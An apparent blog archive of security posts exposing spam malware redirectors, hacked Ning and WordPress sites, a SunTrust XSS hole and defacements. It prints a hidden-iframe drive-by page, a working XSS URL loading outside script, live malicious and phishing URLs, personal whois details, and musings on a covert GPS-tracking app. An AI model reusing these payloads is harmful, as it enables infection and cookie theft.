Tag Archives: computer security

reCAPTCHA is Toast

Posted on by
4

Over the past six weeks or so, one o my email accounts has been flooded with spam advertising phony Internet “pharmacy” sites and penis pill sites.

It still blows my mind to this very day that people actually give money to these folks and actually believe they are getting real drugs, rather than corn starch and food coloring, in return, but that’s a whole separate issue.

The spam I have been getting differs from the ordinary, garden-variety junk “pharmacy” spam I get in that all of it advertises URLs belonging to social networking sites. Each URL is a phony profile of a bogus user, whose user information is nothing but a redirector to a spam site.

I’ve seen this happen before. Usually, it happens when some naive person decides to set up a niche social networking site of some sort, like a social networking site for professional engineers who work in Third World countries or a site for some obscure band or something, but doesn’t know anything about security.

The Russians love people like that. Nearly all Internet pharmacy sites, even (especially) the ones that claim to be Canadian, are run by Russian organized crime. The various crime gangs use bots–computer programs that automatically scan through hundreds of thousands of Web sites per day, searching for small social networking sites. When they find one, they attempt to create phony users. If they succeed, the bot software will start setting up thousands, or even tens of thousands, of bogus users, all automatically, and stuff those bogus user profiles full of ads for the phony pharmacy sites.

So you’ll end up with some Web site that’s dedicated to fans of some Brazilian soccer team or something, and it will have 27,498 users with names like “BuyCheapTramadolHere.” Whenever you visit the user profile page for the site, you get redirected to the fake pharmacy. The spammers then advertise the URL of the Brazilian soccer team site in their spam emails.

This is why it is absolutely essential that anyone who sets up a Web site that allows users to sign up and create profiles must, absolutely must, use some kind of system to prevent bot software from creating phony profiles.

Enter the CAPTCHA–those weird squiggly lines of text that you have to type in in order to fill out many Web forms. The idea behind a CAPTCHA is that a computer program can’t read the words, so computer programs can’t be used to fill out the form.

Organized crime has spent a huge amount of money and time in trying to figure out ways to break CAPTCHAs. Some of the most cutting-edge work in computer optical character recognition is coming from Eastern European organized crime. (Some Web services, such as Gmail, are worth so much to organized crime–mail sent from a Google mail server is almost never blocked by spam filtering software–that organized crime gangs have been known to pay unemployed Third Worlders a penny or so apiece to sit in front of a computer typing in CAPTCHA codes all day.) Another strategy that criminals have used to defeat high-value CAPTCHAs is to do things like set up phony Web sites offering free porn to people if they type in CAPTCHA codes first.

In the past, whenever I have received spam advertising a URL or a redirector hosted on a social networking site, the social networking site isn’t using a CAPTCHA. That makes it trivial for the spammers to create phony accounts to act as redirectors to their spam sites.

CAPTCHAs are such a mandatory part of good Web practice that there are businesses whose sole business is providing CAPTCHA generation software or services to Web owners. One such business is a company called reCAPTCHA, which provides free CAPTCHAs for Web site owners. Hundreds of thousands of Web sites, including many high-profile sites like Craigslist, use CAPTCHAs generated by reCAPTCHA.

And that’s where things get interesting.

Back to my inbox.

Like I said, it’s been flooded lately. I’ve seen literally thousands of bits of spam all advertising bogus profiles on various social networking sites.

Unsurprisingly, many of them are hosted by Ning, the failed and woefully insecure social networking platform cofounded by ex-Netscape cofounder Marc Andreessen, and which today seems to serve primarily as a platform for spammers (as I’ve detailed here). The URLs in the spam look like this:

http://scaryguy.ning.com/profiles/blogs/detrol-detrol-la-homeopathic
http://myjumpspace.ning.com/forum/topics/zocor-zocor-similar-products
http://igotittoo.ning.com/profiles/blogs/cialis-professional-cheapest
http://morecoffee.ning.com/forum/topics/acai-fit-com-now-foods-acai
http://onelion.ning.com/forum/topics/desyrel-buy-cheap-desyrel
http://tvsbrasil.ning.com/profiles/blogs/namenda-tapering-namenda-buy
http://cincinnatiown.com/profiles/blogs/omeprazole-marijuana-and

So in other words, about par for the course for Ning; it’s a sewer of spam, and since it recently fired most of its staff, it’s unlikely ever to improve.

But a lot of the other URLs I’ve been seeing aren’t hosted on Ning:

http://celexa108s.mysoulspot.com/
http://www.design21sdn.com/people/52077
http://community.sgdotnet.org/forums/t/28066.aspx

Those three sites (mysoulspot.com, design21sdn.com, and sgdotnet.org) have been hit particularly hard which each of them currently hosting literally thousands or even tens of thousands of spam profiles.

I visited these and other social networking sites that kept popping up in my spam, expecting to see that they were not using CAPTCHAs to protect themselves from bot software signups.

But that isn’t what I found at all. Instead, what I discovered is that every one of the sites I’m seeing that’s being attacked, including the Ning sites and the social networking sites not related to Ning, are using reCAPTCHA as their CAPTCH provider.

All of them.

Which suggests very strongly to me that reCAPTCHA has been busted. Organized crime has written, I suspect, software that is effective enough at breaking reCAPTCHA protection that it is effectively useless.

Computer Malware in 4 seconds

Posted on by
96

One of my email inboxes lately has been flooded with spam for phony “Canadian pharmacy” sites (does anyone actually believe that scam? Seriously?) And when I say “flooded,” I mean “50-60 a day or so.”

These spam messages come in two varieties. One is standard straight-ahead spam: an image, sometimes in the email and sometimes loaded remotely loaded from the spam site, that advertises cheap prices on Viagra, and a Web link to the spam pharmacy site itself.

The other variety is different. It’s invariably a message claiming to be a bounced email notification, a greeting card notification, or something along those lines, with an attached HTML file. The HTML file, if it is open, redirects to some poor schmuck’s hacked Web site, where it displays the message

“Please, waiting….. 4 seconds”

Then after 4 seconds, it redirects to the same spam pharmacy sites as the first variety.

“Well, hmm,” I thought to myself, “that’s odd. Why is the redirector waiting for four seconds?”

So I looked at some of the redirector pages, and the answer seems to be “Because the spammers are now shitting where they eat.”

Spammers have used computer viruses and malware for years. That’s nothing new. Most computer spam is sent through home Windows PCs that have been infected by viruses. The viruses install back-door remote control software and email server software on the infected PC; the spammers then take over the infected PC, without the owner knowing, and use it to send spam.

But generally speaking, in the past the spammers have not tried to use their fake pharmacy sites th spread malware. They have preferred to keep the malware and the phony medicine separate; they spread malware through one set of sites, and sell fake prescription meds through another.

Not any more.

The new system attempts to download computer malware onto the computers of people who respond to the spam. Here’s how it works:

Step 1: The spammers hack a poorly secured Web site. Often, these are Web sites run by very small companies, using outdated ecommerce software without security patches. I’ve also seen a whole bunch of these sites hosted on GoDaddy and The Planet; I don’t know if these ISPs are directly being attacked, but they seem to be hosting the bulk of the hacked sites.

Step 2: A file named “index3.html” is placed on the hacked Web site. This file looks like this:

PLEASE, WAITING…. 4 sec

<meta http-equiv=”refresh” content=”4;url=http://knewname.com” />

<iframe src=’http://panlip.ru:8080/index.php?pid=10′ width=’1′ height=’1′ style=’visibility: hidden;’></iframe><br>

Step 3: A spam email is created. The spam email has an attached HTML file that looks like this:

<meta http-equiv=”refresh” content=”0;url=http://designcomforttx.com/index3.html” />

*** WARNING *** WARNING *** WARNING ***
The URLs above and elsewhere in this post are live as of the time of this writing. They WILL attempt to download malware in an iFrame before redirecting to a spam pharmacy site. DO NOT attempt to visit these URLs if you don’t know what you’re doing!

Anyone who opens the HTML file attached to the spam email visits the hacked site, in this case designcomforttx.com. They stay on that site for 4 seconds while a hidden iFrame attempts to download a file from another site, in this case the Russian site panlip.ru, hosted by Tata Communications in India. After 4 seconds, the mark is redirected to a run-of-the-mill Badcow fake “Canadian” pharmacy page, in this case knewname.com, hosted in China.

I have not been able to determine what the iFrame does. On my machine, it downloads blank content. I’ve Googled some of the domains being used in these iFrames (there are several different domains being used in the attacks); some people have claimed that the attack domains examine the user’s browser, then attempt to download a PDF exploit or some other browser exploit if they detect a vulnerable browser configuration.

I’m seeing LOTS of these hacked Web sites, always with a file named “index3.html” and always with a hidden iFrame. The index3.html file always redirects to knewname.com but may first load the iFrame from one of many different sites.

A partial list of hacked sites, some of which are still active at the time of this writing and some of which are not, includes:

designcomforttx.com/index3.html
arenafence.ca/index3.html
powerchurchsoftware.com/index3.html
ektalimoservice.com/index3.html
madeinperu.net/index3.html
whitakermedical.com/index3.html
shaolinmonk.net/index3.html
eyesensations.com/index3.html
trendzmarket.com/index3.html
identigen.com/index3.html
yasetai.com/index3.html
highlandparkbuilders.com/index3.html
retreatsatstonefountain.com/index3.html
3iconstruction.com/index3.html

In each case, the “index3.html” file is virtually identical, with the only difference being the server it attempts to load the iFrame from. Attack domains I have seen used in the iFrames include:

http://panlip.ru:8080/index.php?pid=10
http://sheepbody.com:8080/index.php?pid=10
http://cafemack.com:8080/index.php?pid=10

whois panlip.ru

% By submitting a query to RIPN’s Whois Service
% you agree to abide by the following terms of use:
% http://www.ripn.net/about/servpol.html#3.2 (in Russian)
% http://www.ripn.net/about/en/servpol.html#3.2 (in English).

domain: PANLIP.RU
nserver: ns1.dnsofthost.com.
nserver: ns2.dnsofthost.com.
nserver: ns3.dnsofthost.com.
nserver: ns4.dnsofthost.com.
state: REGISTERED, DELEGATED, VERIFIED
person: Private Person
phone: +7 472 2311731
e-mail: tips@freenetbox.ru
registrar: NAUNET-REG-RIPN
created: 2010.07.05
paid-till: 2011.07.05
source: TCI

whois sheepbody.com

Domain Name: SHEEPBODY.COM
Registrar: ONLINENIC, INC.
Whois Server: whois.onlinenic.com
Referral URL: http://www.OnlineNIC.com
Name Server: NS1.DNSOFTHOST.COM
Name Server: NS2.DNSOFTHOST.COM
Name Server: NS3.DNSOFTHOST.COM
Name Server: NS4.DNSOFTHOST.COM
Status: clientTransferProhibited
Updated Date: 07-jul-2010
Creation Date: 07-jul-2010
Expiration Date: 07-jul-2011

Registrant:
Anna Veprinceva es@qx8.ru +7.4957211411
Anna Veprinceva
ul.Kostromskaya d.4 kv.114
Moskva,Moskva,RU 127549

Registration Service Provider:
name: DNRegistrar.ru
tel: +7.4955041111
fax: +7.4955041111
web:http://www.dnregistrar.ru

whois cafemack.com

Domain Name: CAFEMACK.COM
Registrar: ONLINENIC, INC.
Whois Server: whois.onlinenic.com
Referral URL: http://www.OnlineNIC.com
Name Server: NS1.DNSOFTHOST.COM
Name Server: NS2.DNSOFTHOST.COM
Name Server: NS3.DNSOFTHOST.COM
Name Server: NS4.DNSOFTHOST.COM
Status: clientTransferProhibited
Updated Date: 07-jul-2010
Creation Date: 07-jul-2010
Expiration Date: 07-jul-2011

Registrant:
Alexander Ksalov soy@qx8.ru +7.4957888901
Alexander Ksalov
Izyumskaya ul. d.26 k.2 kv.54
Moskva,Moskva,RU 117042

Registration Service Provider:
name: DNRegistrar.ru
tel: +7.4955041111
fax: +7.4955041111
web:http://www.dnregistrar.ru

The payload site, knewname.com, is pixel-for-pixel identical to the other, more traditional pharmacy spam sites I’m seeing, such as superviagraonline.com. These sites are themselves virtually identical to, and use the same graphics as, other spam sites that places like the Spamtrackers wiki have connected to other Canadian Pharmacy spam (known Canadian Pharmacy spam site on left, knewname.com on right, click either thumbnail for a larger screen shot):

      

Conclusion: The Canadian Pharmacy spammers are directly involved in the writing and/or distribution of malware themselves, and have now begun an experiment in which they attempt to infect their own customers with their malware.

Is this evil?

Posted on by
76

When you buy a phone, especially a smart phone, you don’t really have a lot of control over what software goes on your phone or how your phone is used.

That’s a fact. It’s always been that way, and it will likely continue to be that way for the foreseeable future.

Apple has taken a lot of (well-deserved, in my opinion, and I say this as an iPhone user) shit for their weird app control-freakery. No porn, no apps developed using tools other than Apple’s own Xcode, no apps they find “controversial” or “offensive”…and the whole app approval progress is as opaque as Glenn Beck’s sense of ethics.

So a lot of folks are turning to Google’s Android phones, in the misguided and poorly-founded belief that the fact part of the Android stack is open source somehow means Google doesn’t exercise just as much control over the platform. This despite the fact they have on a few occasions now refused to host apps that various telcos have asked them not to.

I’m not in the market for a new smartphone, so I’ve been watching the whole thing from the sidelines. But something did catch my eye recently, and it’s got me thinking down a path that zaiah thinks is evil.

Last week, a security researcher released a Google app that claimed to be a preview of the new Twilight film–you know, the one about lame-ass sparkly vampires or something, written by a conservative Mormon woman who wanted a nice Christian alternative to the evil witchcraft that’s woven all through the Harry Potter saga like evil anchovies on the pure pizza of God, so she wrote about stalking and violence and rape instead. Because, of course, the main theological debate facing scholars in the dawn of the 21st century is “who would Jesus rape?” But I digress.

Anyway, the app secretly contacted his server in the background and downloaded (innocuous) code. He wanted to see how easy it would be to persuade people to download an Android app that could install a rootkit, and how easy it would be to get such an app onto the Google app marketplace.

The answers turned out to be “a whole lot” and “easier than opening a bag of Cap’n Crunch, apparently.

When Google found out, they vaporized all the copies of his app from all the Android smartphones out there.

Now, Apple also has a remote-kill switch. This is part and parcel of the state of the smart phone biz. A smart phone carrier or software vendor can reach out remotely and vaporize apps or files from your phone, without you being able to do anything about it. That’s the way it is.

But when Google vaporized this research app, the researcher discovered something interesting–Google also has the ability to remotely ADD an app to a user’s phone without the user knowing it. Google can remotely install software on Android phones over the air.

And that opens an interesting can of worms, oh yes it does.

The courts have ruled on several occasions that a company that has the ability to do something may be compelled to do it by a court order, whereas it is far more difficult to compel a company that does not have the capability to do something to add that capability.

Take Amazon and the Kindle (please!). Amazon revealed that it can remotely nuke a book from Kindles all over the world when someone started selling bootleg copies of George Orwell’s 1984, and Amazon reached out and wiped them.

Amazon then tearfully confessed that doing so had been an error in judgment and swore it would never do it again, but at this point they no longer have that option. Since they have demonstrated the ability to do it, the next time someone’s intellectual property is stolen and distributed for Kindle, the rights holder may be able to get a court order to force Amazon to nuke the offending files whether Amazon wants to or not.Amazon made that bed and might not have a choice about sleeping in it.

So here’s the conundrum I’m pondering. Since Google has the ability to remote install apps, what would happen if Google were forced by court order to use it? What would that do to the cell phone industry? Would people start staying away from Android in favor of other platforms without that ability? More important, would it lead to social dialog over what kind of power we should be willing to cede to the phone operators?

I’m considering writing an Android app that runs in the background and sends the GPS coordinates of the phone to a server every few minutes. I am also thinking about approaching a bunch of police departments and saying “I’ve written this app. I will not distribute it to anyone except law enforcement. If you get a court order to put it on someone’s phone, I’ll give it to you and you can compel Google to install it remotely.”

Might not ever get used. But the first time it did get used, I have a feeling it’d generate quite a shitstorm. And open a conversation that I think probably needs to happen.

zaiah says that doing this would be evil. What say you, Oh Interwebs?

Email: The Next Brute-Force Attack Frontier

Posted on by
12

A few days ago, I got emails from a group of folks who said I’d sent them spam. This happens from time to time, as spammers tend to forge the “From” addresses in the spam emails they send.

A couple of those folks were kind enough to forward me samples of the spam emails with full headers, and as it turns out, they did in fact come from my email server, though with a Ukranian IP address.

It would seem there’s a spam group in Eastern Europe that is doing brute-force attacks on large numbers of email addresses, attempting to find the passwords for IMAP and SMTP accounts. I have an AOL email address whose password, foolishly, was a dictionary word–an uncommon word, to be sure, but a dictionary word nonetheless. This is the password that was compromised.

Since then, I’ve heard of a couple other folks who’ve had the same thing happen to them. Legitimate email accounts without highly secure passwords breached, apparently in brute-force attacks, and then used to send large volumes of spam.

So the lesson here: Choose secure email passwords! If your email account password is weak, it may end up being compromised.

OUCH! SunTrust’s Web site is PWN3d!

Posted on by
30

I know some of my regular readers have accounts with SunTrust bank. If you do, and you recently received an email telling you that your account records need to be updated, and you clicked on any link in that email, change your account password IMMEDIATELY. It is not necessary for you to have typed in your account username and password at the prompt; the attack can lift the SunTrust cookies from your browser.

You see, SunTrust left a security hole in their Web server; this security hole allows an attacker to use what’s called a “cross site scripting” attack to take control of the pages you see when you browse to SunTrust URLs.

I have confirmed this security hole exists, and have created a quick demo to show how it works. If you click on this link:

Clicky here
[EDIT:] Within 5 minutes of my making this post, LiveJournal’s servers flagged the link as a cross-site scripting link and disabled it. Nicely done! Kudos to the LJ team for making their software aware of hostile links. If you want to try out my demo of the vulnerability, copy into your browser:

http://helpcenter.suntrust.com/doc/sn6400.xml?SID=586&TOPNAME=%22%3E%3C/a%3E%3Cscript%20src=%22http://www.obsidianfields.com/suntrustxssdemo/xssdemo.js

you will be taken to the Web site helpcenter.suntrust.com, a legitimate SunTrust Web page.

[UPDATE]: As of Wednesday afternoon, SunTrust’s IT people have fixed the XSS hole.

But wait! What do you see? If the security hole still exists when you visit this URL, you’ll see a red Web page reading “The cross-site scripting vulnerability at helpcenter.suntrust.com IS STILL ACTIVE”. What’s going on?

What’s going on is that helpcenter.suntrust.com can be fooled just by manipulating the URL into loading content from anywhere on the Web, overwriting whatever is supposed to be there. No, I don’t have access to the SunTrust servers directly, and neither does the attacker. What I CAN do is create a Web page with anything I want, and then create a link that causes my Web page to load at helpcenter.suntrust.com in place of what is supposed to be there. And, if I wanted to, I could also read SunTrust cookies stored in your browser as well, presumably including login cookies if you have ticked the “remember me” checkbox on SunTrust’s login page.

In English, that means you can not trust anything you see displayed at helpcenter.suntrust.com, even if you are 100% positive that the URL of your browser is in fact helpcenter.suntrust.com. It is trivial to create malicious links that change the content displayed at helpcenter.suntrust.com, as I haveshown in my example. This security hole is currently being used in a “phishing” attack that shows you what looks like a perfectly legitimate login page at helpcenter.suntrust.com, but is in fact a page under the control of the hacker on a hacked Web server in Australia.

Technical details under the cut

ecommerce.com: hacked by GHoST61

Posted on by
16

Last week, I was on a Web forum where someone taked about his Web site being defaced. He’d been running an insecure install of phpNUKE without keeping on top of security patches, and his site was taken down and replaced with a page reading “Hacked by GHoST61” and a picture of the first president of Turkey.

I did some investigating, and discovered that GHoST61 is a prolific Turkish hacker who defaces Web pages in a very characteristic way; he or she replaces the home page with the message “Hacked by GHoST61” and sometimes a picture of the Turkish president, sometimes a missive against the Iraqui war, and sometimes a combination of both.

GHoST61 generally strikes me as being more of a script kiddie than a serious, knowledgable hacker. A Google search for the phrase “Hacked by Goost61” currently turns up about 30,000 results, the majority of which look like sites running old, outdated, insecure installs of phpNUKE, Drupal, ZenCart, osCommerce, or other server apps with known security holes. The attacks are probably automated, with point-n-drool tools that search for known vulnerabilities in popular Web application and content management packages.

In other words, GHoST61, whoever he or she is, mostly goes after low-hanging fruit.

Mostly.

Just because it’s what I do, I started wading through the Google results and checking to see where the hacked sites were hosted. And I found something of a surprise.

I checked several results, and found the majority of them were living on a single ISP, ecommerce.com (which does Web hosting under the names iX Web Hosting and WebHost.biz).

Curious, I kept digging, choosing random Google results to examine (in case the order of the Google results were determined by time, and the hacker just happened to be searching in IP space belonging to ecommerce.com recently). What I discovered was that the majority of hacked sites all across Google’s results, by a large margin, were hosted in the same place.

The next thing I thought was that it could be simply a question of the ISP’s size. After all, if the Web sites that had been defaced were spread out evenly across many ISPs, and one ISP hosted a million sites whereas another ISP hosted only ten thousand sites, I’d expect to see more hacked sites hosted on the larger ISP, right?

But this didn’t hold water, either. The ISP ecommerce.com advertises that it hosts about 500,000 sites. Much larger Web hosting companies such as Peer 1 hosted a far smaller number of hacked sites.

So I started counting. I grabbed a bunch of Google results at random, looked to see who was hosting them, and recorded the results. Here’s what I found (number of hacked sites on the vertical axis, Web hosting company on the horizontal axis):

It seems to me that ecommerce.com has a problem here. While GHoST61 will hack vulnerable Web sites with security holes no matter where they’re hosted, there is a very, very large cluster of hacked sites living on ecommerce.com servers.

This may indicate that ecommerce.com doesn’t enforce good security practices, or that ecommerce.com is slow to respond to hack attacks. Or it may indicate a more systemic problem at ecommerce.com, such as some sort of server-level vulnerability that allows easy penetration of many of their Web sites.

Whatever the problem, it definitely appears that ecommerce.com has some sort of issue here.

Ning: Where security is something we consider.

Posted on by
22

A few days ago, I wrote about what appears to be a massive breach at Ning, a social networking platform that allows people to create their own niche social networking sites. The Ning security appears to be compromised, and the social networking sites they host are overrun with automated spam advertising links and redirectors to computer viruses–over a million of them, in fact.

As a good Internet citizen, I dropped an email to Ning alerting them to the problem. I’ve since received back what appears to be a stock form email in response:

Hi there,

Thanks for bringing this to our attention. As you may already know, Ning is a platform that enables individuals to build their own social networks. We aren’t involved in the decisions relating to content uploaded or published by Network Creators or members. In addition, we aren’t involved in the management of the social networks on our platform, or in any of the decisions relating to the focus of social networks created on our platform. That said, we’ll look into this and take action if we determine that our Terms of Service have been violated.

Thanks again!
The Ning Team

ref:00D8cCLt.5004AJJb9:ref

I’ve checked, and the problem still exists. Google is delisting the virus redirectors pretty quickly, but they’re being added even more quickly. Right now, Google shows about 600,000 virus redirectors on various Ning-hosted sites, with many more existing but not listed in Google.

It seems that Ning either does not understand or does not care about the scope of the problem they face.

In a way, I’m not surprised. iPower Web took over a year to fix their security when they were hit with a massive, ongoing server security breach, for example.

But it is disappointing. An executive at Verizon recently wrote an essay deriding security researchers who talk about security issues publicly as “narcissistic vulnerability pimps” who “solely for the purpose of self-glorification and self-gratification – harms business and society by irresponsibly disclosing information that makes things less secure.”

But considering how poorly ISPs and software vendors tend to respond to security problems, and how cavalier they seem to be with the safeguarding of their users’ data, it’s hard to see this essay as anything more than the whining of a crybaby managers who would rather play Quake III Arena than take care of fixing gaping security holes in their systems.

Meantime, I still suggest that anyone hosted on Ning seek hosting elsewhere.

Another day, another massive computer hack attack

Posted on by
10

Note: followup to this post at http://tacit.livejournal.com/325770.html

I run quite a number of WordPress blogs: weeklysextips.com, the Whispers blog at symtoys.com, the Skeptical Pervert blog (which I haven’t actually started doing anything yet, as I haven’t started my podcast yet), and so on.

These blogs all run comment spam filtering software, because automated WordPress comment spam is a big problem with any WordPress blog. A lot of the automated comment spam contains, of course, redirectors to malware, mostly disguised as porn links.

I occasionally trawl through the spam comments on my blogs; it’s an amazing early warning system to see what the malware writers are up to these days. Recently, I found a spate of malware spam advertising URLs hosted on a Web site called nashville.net; the spam promised all sorts of free sexual delights if I would but go to such Web addresses as

http://www.nashville.net/profile/3nz5lxzvocvcd
and
http://www.nashville.net/profile/jetttoland59

and so on.

I did some poking around on Nashville.net and discovered that it has been compromised like a Senator with a gambling addiction; at the moment, it’s hosting somewhere around 4,200 phony profiles, all of which are redirectors to sites that try to download malware. Each phony profile leads to the same place: a URL at

http://sexsuite.ru/stds/go.php?sid=14

which is a traffic handling Web site that works the same way that the traffic redirector sites used by malware networks I’ve talked about before do.

So I decided to be a good citizen and drop a line to the owner of nashville.net, and his Web host, letting him know he’d been massively breached.

That’s when things got interesting.

The Web site nashville.net is a “community site,” a small niche social networking site hosted by an outfit called Ning.

Parsing input: nashville.net
Routing details for 8.6.19.68
“whois NET-8-6-19-0-1@whois.arin.net” (Getting contact from whois.arin.net )
Found AbuseEmail in whois abuse@ning.com
8.6.19.0 – 8.6.19.255:abuse@ning.com
Using abuse net on abuse@ning.com
abuse net ning.com = postmaster@ning.com, abuse@ning.com, abuse@level3.com

Ning is a personal social networking site founded by the guy who started Netscape, Marc Andreessen. It basically lets you create your own mini MySpace or LiveJournal or whatever you like–a small social networking platform aimed at whatever niche you want. It’s had a checkered past, and has struggled to make money; three days ago, Ning announced that it would become pay only and would cancel its free services. It also fired 40% of its staff.

But that’s not the really interesting part.

The really interesting part is that it looks like all of Ning, with all the social networks and online forums it hosts, has been pwn3d from balls to bones.

A search for some of the exact words and phrases used by the virus redirectors on nashville.net, one of Ning’s social networking sites, produces 1,060,000 results…and as near as I can tell, they are all on Ning.

Now, a conspiracy theorist might come up with all kinds of conspiracies to explain this–disgruntled employees, knowing what was coming, leaving the back door open; executives of a foundering company, desperate for cash, turning a blind eye to Russian malware writers; whatever. I suspect that the reality is what it always is–incompetence, someone asleep at the switch, management that doesn’t appreciate security and doesn’t want to pay for it…the same sorts of things that seem to be behind this sort of thing almost every time.

But if you use Ning, or you know someone who does, my advice is to leave.

Profiteering from affiliate programs, the Russian organized crime way

Posted on by
10

I have a Formspring.me account. If you’re not familiar with it, Formspring is a Web site that you can use to receive anonymous questions from people, which you can then answer in a way that lets everyone read your answers.

It’s actually pretty cool. My Formspring account is here, and I kind of enjoy answering random questions from folks. If, y’know, there’s something you want to ask.

Anyway, a few days ago I got this message posted anonymously to my Formspring:

Hey, I am posting anonymous because I don’t want you to know who I am but I found a nude image of you online.You may have to login to see it, but here’s the link: nudeimagedatabase(DOT)t35(DOT)(DOT)com/nude_image_549(DOT)html replace all the (DOT) with .

Now, first thing I thought was Russian mob spreading computer malware–Zlob or Asprox or something, right? I mean, seriously, it’s got their thumbprint all over it.

Turns out that’s not what it was, though. What it was is something a little more convoluted, and it exposes a weakness in Web sites that have a pay-for-signups affiliate program business model.

We're about to get technical here…

Pwning WordPress for fun and profit

Posted on by
30

I have a love/hate relationship with WordPress.

Actually, that’s not true. I like WordPress rather a lot, and I wish that more open-source projects had the finish, polish, and sophistication of WordPress. I own about a half-dozen Web sites that run it, and I’m overall very fond of it.

What I don’t like is the number of people who set up a WordPress install, then walk away from it and never install any updates or security patches. WordPress is a popular target for hackers, because it’s widely deployed and easy to find, and because so, so many people don’t keep on top of updates.

Which, frankly, baffles me. It’s incredibly easy to update–easier, in fact, than any open-source server software I’ve ever used. You log in to the admin area. It tells you “There is an update. Click here to install the update.” You click one button. Bang, that’s it! There literally is nothing else you have to do.

So, anyway, today I found yet another phony bank phish in my email. The phish pretends to be an HSBC Bank page, and it attempts to trick the gullible into handing out their bank account number and password. So far, so bog-standard.

*** WARNING *** WARNING *** WARNING ***
The URLs in this post are live at the time of this writing. They do not lead to malware sites, but they DO lead to phony bank phish sites.

The phish page in my email lives at

http://internalcommunications.co.uk/img/1/IBlogin.html

It’s a pretty bog-standard phish, a page living on a hacked server that collects personal financial information and then sends them off to the phishers via a php-to-email script.

The server that it lives on, internalcommunications.co.uk, is hosted by heartinternet.co.uk and belongs to a guy named Simon Wright; his Whois details, including his email address, are protected by a privacy service.

The site itself is completely defaced. The defacement left a hole big enough to drive a truck through, and the phishers put the phony bank page on the site after the person or group who defaced it hacked it and left it wide open. EDIT: The site defacer, who goes by the name “NONE-STOP,” is also a phisher who sells stolen credit card numbers, stolen bank account login information, and other stolen identity information. More at the end of this post.

The front page of the hacked site, as of the time of this writing, looks like this (click for larger):

I haven’t heard of NONE.STOP, whoever he/she/they are; as near as I can tell, there’s only one other site defacement (www.cegm.ca) he/she/thay have claimed responsibility for.

Now is where it gets interesting, and where WordPress comes in.

Normally, when a site is defaced, the images that are used in the defacement are uploaded to the hacked server. Not in this case. In this case, the images used in the defacement are being remote loaded from another server.

A hacked WordPress install, that was set up a while ago, had a single test post added to it, and was abandoned.

Specifically, the images used in the defacement are being loaded from

http://devriestree.com/components/com_content/views/.index/aa__blut.gif
http://devriestree.com/components/com_content/views/.index/4scpcn.jpg

and so on. The Web site devriestree.com is the one running the pwm3d WordPress, and it has been left alone; no defacement, no phishes, nothing. The person or group called NONE.STOP has simply created a hidden .index directory which is being used to store the pictures that he/she/they use when he/she/they deface other sites.

The site devriestree.com is hosted at Server Beach, and belongs to:

$whois devriestree.com

Whois Server Version 2.0

Domain Name: DEVRIESTREE.COM
Registrar: GODADDY.COM, INC.
Whois Server: whois.godaddy.com
Referral URL: http://registrar.godaddy.com
Name Server: NS.NETVTECH.COM
Name Server: NS1.GEODNS.NET
Name Server: NS2.GEODNS.NET
Status: clientDeleteProhibited
Status: clientRenewProhibited
Status: clientTransferProhibited
Status: clientUpdateProhibited
Updated Date: 21-oct-2008
Creation Date: 19-oct-2005
Expiration Date: 19-oct-2010

Registrant:
NetVenture Technologies, Inc.
1490 S Military Trail
Suite 13E
West Palm Beach, Florida 33415
United States

Registered through: GoDaddy.com, Inc. (http://www.godaddy.com)
Domain Name: DEVRIESTREE.COM
Created on: 18-Oct-05
Expires on: 19-Oct-10
Last Updated on: 12-Jul-07

Administrative Contact:
DeVries, James j@netvtech.com
NetVenture Technologies, Inc.
1490 S Military Trail
Suite 13E
West Palm Beach, Florida 33415
United States
5613016666 Fax — 5618288035

Technical Contact:
DeVries, James j@netvtech.com
NetVenture Technologies, Inc.
1490 S Military Trail
Suite 13E
West Palm Beach, Florida 33415
United States
5613016666 Fax — 5618288035

Domain servers in listed order:
NS1.GEODNS.NET
NS2.GEODNS.NET
NS.NETVTECH.COM

The Web site at netvtech.com

Folks, seriously, update your WordPress installs. It’s automatic and effortless.

EDITED TO ADD:
The person who defaced the Web site and who is storing his images on hacked WordPress sites has a Web site of his own, through which he sells stolen credit card numbers, phish kits, stolen bank account information, and so on. His Web site is at

http://ne-stop.com/
hosted by Hurricane Electric.

$whois ne-stop.com

Whois Server Version 2.0

Domain Name: NE-STOP.COM
Registrar: REGISTER.COM, INC.
Whois Server: whois.register.com
Referral URL: http://www.register.com
Name Server: NS1.HE.NET
Name Server: NS2.HE.NET
Name Server: NS3.HE.NET
Status: clientTransferProhibited
Updated Date: 12-jan-2010
Creation Date: 11-jan-2010
Expiration Date: 11-jan-2011

>>> Last update of whois database: Mon, 18 Jan 2010 07:57:57 UTC <<< Registration Service Provided By: Hurricane Electric Internet Services Contact: hostmaster@he.net Visit: hurricanenames.net Domain name: ne-stop.com Registrant Contact: Ladde Weiong Ladde Weiong () Fax: 125 Club Garden Road Sheffield, S11 8BW GB Administrative Contact: Hurricane Electric Internet Services Hostmaster he.net (hostmaster@he.net) +1.5105804100 Fax: 760 Mission Court Fremont, CA 94539 US Technical Contact: Hurricane Electric Internet Services Hostmaster he.net (hostmaster@he.net) +1.5105804100 Fax: 760 Mission Court Fremont, CA 94539 US Status: Locked Name Servers: ns1.he.net ns2.he.net ns3.he.net Creation date: 11 Jan 2010 11:56:14 Expiration date: 11 Jan 2011 11:56:14 As of the time of this writing, the front page of the site looked like this (click for larger):